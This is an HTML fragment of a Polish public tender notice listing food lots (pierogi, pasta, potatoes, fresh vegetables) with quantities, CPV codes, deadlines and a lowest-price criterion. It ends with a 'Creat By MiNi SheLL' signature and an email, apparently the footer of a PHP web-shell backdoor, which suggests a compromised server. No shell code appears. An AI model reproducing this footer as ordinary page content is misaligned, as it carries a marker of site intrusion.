<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi ruskie  domowe	Kg.	500 kg
2	Pierogi z kapustą  i pieczarkami 	kg.	80 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron świderki  op. Nie mniej jak 500 g 	szt	340
2	Makaron gniazda wstążki op. Nie mniej jak 500g 	Szt .	130 
3	Makaron  spaghetti  op. 400 g    	Szt.	350
5	Makaron łazanki  Lubella lub równoważny op. Nie mniej jak 400g Szt.250
6	Makaron rurki op. 1 kg	Szt 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.12.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZIEMNIAKI JADALNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Ziemniaki jadalne późne  op. worek nie mniej jak  30 kg 
Polska Norma - PN-R-74450:1975  kg	 8000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> WARZYWA ŚWIEŻE SEZONOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	POMIDOR ŚWIEŻY 	kg	270 
2	OGÓREK ŚWIEZY 	Kg	250
4	SAŁATA 	Szt	150
6	PAPRYKA  ŚWIEŻA 	kg	70
7	KALAFIOR ŚWIEŻY 	szt 	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.40-0, 03.22.12.30-7, 03.22.12.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com